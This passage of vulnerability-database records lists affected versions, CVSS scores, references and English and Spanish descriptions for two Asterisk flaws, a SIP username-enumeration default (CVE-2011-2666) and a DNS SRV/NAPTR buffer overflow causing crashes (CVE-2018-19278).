              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F745AF0A-D6A6-4429-BBBE-347BF41999BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC44F61B-AB96-4643-899B-19B9E3B4F05C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:*:*:*:*:*:*:*",
              "matchCriteriaId": "F788A255-CF21-424F-9F30-8A744CC16740",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "92B8AA8E-D49B-4AD7-8AFC-BD4F9E9C7A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0606F179-8817-4124-B92B-CD868B216320",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E93609A6-7FFD-4179-86E9-0D1292B035B8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The default configuration of the SIP channel driver in Asterisk Open Source 1.4.x through 1.4.41.2 and 1.6.2.x through 1.6.2.18.2 does not enable the alwaysauthreject option, which allows remote attackers to enumerate account names by making a series of invalid SIP requests and observing the differences in the responses for different usernames, a different vulnerability than CVE-2011-2536."
    },
    {
      "lang": "es",
      "value": "La configuraci\u00f3n por defecto del controlador del canal SIP en Asterisk Open Source 1.4.x hasta 1.1.41.2 y 1.6.2.x hasta 1.6.2.18.2 no activa la opci\u00f3n alwaysauthreject, lo que permite a atacantes remotos enumerar los nombres de las cuentas al hacer una serie de peticiones SIP inv\u00e1lidas y observando las diferencias en las respuestas para distintos nombres de usuario, es una vulnerabilidad distinta a CVE-2011-2536."
    }
  ],
  "id": "CVE-2011-2666",
  "lastModified": "2024-11-21T01:28:43.267",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-07-06T19:55:03.637",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68472"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-011.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68472"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-16"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-11-14 20:29

Modified

2024-11-21 03:57

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Buffer overflow in DNS SRV and NAPTR lookups in Digium Asterisk 15.x before 15.6.2 and 16.x before 16.0.1 allows remote attackers to crash Asterisk via a specially crafted DNS SRV or NAPTR response, because a buffer size is supposed to match an expanded length but actually matches a compressed length.

References

URL	Tags
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2018-010.html	Patch, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-28127	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2018-010.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-28127	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	15.0.0
digium	asterisk	15.0.0
digium	asterisk	15.0.0
digium	asterisk	15.1.0
digium	asterisk	15.1.0
digium	asterisk	15.1.0
digium	asterisk	15.1.2
digium	asterisk	15.1.3
digium	asterisk	15.1.4
digium	asterisk	15.1.5
digium	asterisk	15.2.0
digium	asterisk	15.2.0
digium	asterisk	15.2.1
digium	asterisk	15.2.2
digium	asterisk	15.3.0
digium	asterisk	15.3.0
digium	asterisk	15.3.0
digium	asterisk	15.4.0
digium	asterisk	15.4.0
digium	asterisk	15.4.0
digium	asterisk	15.4.1
digium	asterisk	15.5.0
digium	asterisk	15.5.0
digium	asterisk	15.6.0
digium	asterisk	15.6.0
digium	asterisk	15.6.1
digium	asterisk	16.0.0
digium	asterisk	16.0.0
digium	asterisk	16.0.0
digium	asterisk	16.0.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "75CAA3E0-1D14-4EEB-9F66-3033114389B5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.0.0:b1:*:*:*:*:*:*",
              "matchCriteriaId": "612AC9AC-706F-4013-BA3F-83459E049387",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0D20EE5-E2C7-4CD3-9932-33A0C27465C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C42CFBDA-8B84-4A8F-8C1E-207C48138DFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8B0C2D39-0D85-4655-968F-9B6F48C4DE18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "25307605-D767-4253-BEE7-928B89DA260A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "17F0D6D8-AE61-4A0C-B8D6-D91DECB407D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "DA48CBAB-AD3D-4D2A-9932-D21DB10F0884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A069FD52-C61C-49A4-A863-0FDB21B031B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "491EE070-6913-4AB4-BDB1-CFDCAEFEEFD0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "72541FC4-4CC7-435F-B51D-4754E873EBDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68A2AA7A-C598-4F0A-BF83-C804566C5B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "43A3B57E-1E68-48CF-902E-4C90FC738B5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "AA31B1CB-F285-4893-B7A4-3D16CC15CEED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "188F9FF1-917F-4475-ABD0-AAE7C1DE3FE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0FA8E1FE-EDBB-4514-AC13-9CBD4D960A44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "35EE1555-A2E3-43AF-B2CD-E8765B1BAB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2072763A-8827-46E9-83A3-515034FE5C4E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F794F923-F083-4A74-BB34-111738B975F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C91BFC78-4EB7-40EA-A856-5A5EE8E2F360",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8141848C-3CA7-4985-92F5-43A997D1D58D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "093D158E-5714-4301-8B25-BD4C5084148E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EFEFA2C7-470D-4B8B-AC9A-33B910DB5848",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "91947213-906A-462B-98CA-92346C5537CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7E25333A-4264-44BF-B49F-F955E5C15981",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "579C6BBD-6202-40BC-91F8-AE8F105CE19C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "88011728-31A5-430E-8C86-F57E1BF3A2E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6FA0404B-DB1D-4A14-A6B3-54A754593846",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "DD960877-245A-4F2A-89AE-550E5939EE80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:16.0.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5E7A20DD-11B6-4BDE-B516-15C2E980A1E2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in DNS SRV and NAPTR lookups in Digium Asterisk 15.x before 15.6.2 and 16.x before 16.0.1 allows remote attackers to crash Asterisk via a specially crafted DNS SRV or NAPTR response, because a buffer size is supposed to match an expanded length but actually matches a compressed length."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en las b\u00fasquedas DNS SRV y NAPTR en Digium Asterisk en versiones 15.x anteriores a la 15.6.2 y versiones 16.x anteriores a la 16.0.1 permite que atacantes remotos provoquen el cierre inesperado de Asterisk mediante una respuesta DNS SRV o NAPTR especialmente manipulada. Esto se debe a que se supone que un tama\u00f1o de b\u00fafer coincide con una longitud expandida, pero en realidad coincide con una longitud comprimida."
    }
  ],
  "id": "CVE-2018-19278",
  "lastModified": "2024-11-21T03:57:39.890",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
